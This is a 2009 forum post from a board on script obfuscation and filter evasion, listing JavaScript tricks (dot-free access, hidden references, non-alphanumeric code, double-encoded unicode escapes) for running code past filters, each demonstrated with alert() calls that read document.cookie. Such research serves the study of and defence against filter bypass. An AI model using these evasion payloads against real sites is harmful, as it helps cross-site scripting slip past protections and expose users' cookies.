Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Code Obfuscation Algorithms
Posted by: sirdarckcat
Date: June 08, 2009 08:45PM

// Moar: Ways to make strings

Quote

Avoid using . (dot)
with(document)alert(domain+" "+cookie);
alert(document['domain']+" "+document['cookie']);
Quote

Ways to hide references
alert((0||document||0).cookie);
alert((1&&document||0).cookie);
alert((1?document:0).cookie);
alert([1,document,0][1].cookie);
alert([document].pop().cookie);
alert([document].shift().cookie);
alert(({a:document}).a.cookie);
Quote

Referenced assignment of vars
{var {5:y,2:q,1:z,4:u,3:r,0:w}="velart"}[self][0][z+w+r+q](r+q+z+u+y)(123);//FF only
Quote

NoAlnum
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å);//ff only

Quote

Ternary morph:
eval(((2 < 2 ? 'zxwt' : 'a')+(2 < 2 ? 'zxwt' : 'l')+(2 < 2 ? 'zxwt' : 'e')+(2 < 2 ? 'zxwt' : 'r')+(2 < 2 ? 'zxwt' : 't')+(2 < 2 ? 'zxwt' : '(')+(2 < 2 ? 'zxwt' : '1')+(2 < 2 ? 'zxwt' : ')')))

Quote

Double encoded unicode escapes using regexps:
\u0052\u0065\u0067\u0045\u0078\u0070('\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029')[-1].\u0072\u0065\u0070\u006c\u0061\u0063\u0065(\u0052\u0065\u0067\u0045\u0078\u0070('\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0033\u0031\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0036\u0033\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0033\u0035\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0037\u005c\u0075\u0030\u0030\u0033\u0032\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0037\u005c\u0075\u0030\u0030\u0033\u0034\u005c\u0075\u0030\u0030\u0032\u0038\u005c\u0075\u0030\u0030\u0033\u0031\u005c\u0075\u0030\u0030\u0032\u0039'),\u0065\u0076\u0061\u006c)

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 24 time(s). Last edit at 07/02/2009 10:49PM by sirdarckcat.

Options: ReplyQuote


Sorry, only registered users may post in this forum.